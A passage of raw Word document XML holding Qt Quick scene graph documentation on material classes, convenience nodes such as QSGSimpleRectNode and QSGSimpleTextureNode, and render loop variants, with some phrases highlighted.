              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1996" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="004F7B6E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGSimpleMaterialShader</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Convenient way of building custom OpenGL-based materials for the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1997" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="004F7B6E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGOpaqueTextureMaterial</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 xml:space="preserve">Convenient way of rendering </w:t>
            </w:r>
            <w:r w:rsidRPr="004F7B6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>textured geometry</w:t>
            </w:r>
            <w:r w:rsidRPr="001113FB">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1998" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="004F7B6E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGTextureMaterial</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Convenient way of rendering textured geometry in the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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4F7B6E" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1999" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="004F7B6E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="FF0000"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGVertexColorMaterial</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113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001113FB">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Convenient way of rendering </w:t>
            </w:r>
            <w:r w:rsidRPr="004F7B6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>per-vertex colored geometry</w:t>
            </w:r>
            <w:r w:rsidRPr="001113FB">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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For more details, see the</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2000" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph - Simple Material</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="009F0E57">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1627" w:name="convenience-nodes"/>
      <w:bookmarkStart w:id="1628" w:name="_Toc483000884"/>
      <w:bookmarkStart w:id="1629" w:name="_Toc483003875"/>
      <w:bookmarkStart w:id="1630" w:name="_Toc483604228"/>
      <w:bookmarkStart w:id="1631" w:name="_Toc483605448"/>
      <w:bookmarkEnd w:id="1627"/>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Convenience Nodes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1628"/>
      <w:bookmarkEnd w:id="1629"/>
      <w:bookmarkEnd w:id="1630"/>
      <w:bookmarkEnd w:id="1631"/>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scene graph API is </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>very low-level and focuses on performance rather than convenience</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Writing custom geometries and materials from scratch, even the most basic ones, requires a non-trivial amount of code</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For this </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reason</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the API includes a few </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convenience classes</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make the most common custom nodes readily available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2001" w:history="1">
        <w:r w:rsidR="001113FB" w:rsidRPr="004F7B6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGSimpleRectNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- a</w:t>
      </w:r>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2002" w:history="1">
        <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclass which defines a rectangular geometry with a solid color material.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2003" w:history="1">
        <w:r w:rsidR="001113FB" w:rsidRPr="004F7B6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGSimpleTextureNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- a</w:t>
      </w:r>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2004" w:history="1">
        <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001113FB" w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclass which defines a rectangular geometry with a texture material.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="009F0E57">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1632" w:name="scene-graph-and-rendering"/>
      <w:bookmarkStart w:id="1633" w:name="_Toc483000885"/>
      <w:bookmarkStart w:id="1634" w:name="_Toc483003876"/>
      <w:bookmarkStart w:id="1635" w:name="_Toc483604229"/>
      <w:bookmarkStart w:id="1636" w:name="_Toc483605449"/>
      <w:bookmarkEnd w:id="1632"/>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scene Graph and Rendering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1633"/>
      <w:bookmarkEnd w:id="1634"/>
      <w:bookmarkEnd w:id="1635"/>
      <w:bookmarkEnd w:id="1636"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the scene graph </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>happens internally in the</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2005" w:history="1">
        <w:r w:rsidRPr="004F7B6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and there is </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no public API</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access it. There are, however, a </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>few places</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the rendering pipeline where the </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user can attach application code</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can be used to </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add custom scene graph content</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render raw OpenGL content</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The integration points are defined by the </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render loop</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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For detailed description of how the scene graph renderer works, see</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2006" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Scene Graph Renderer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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There are </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>three render loop variants</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> available:</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>basic</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
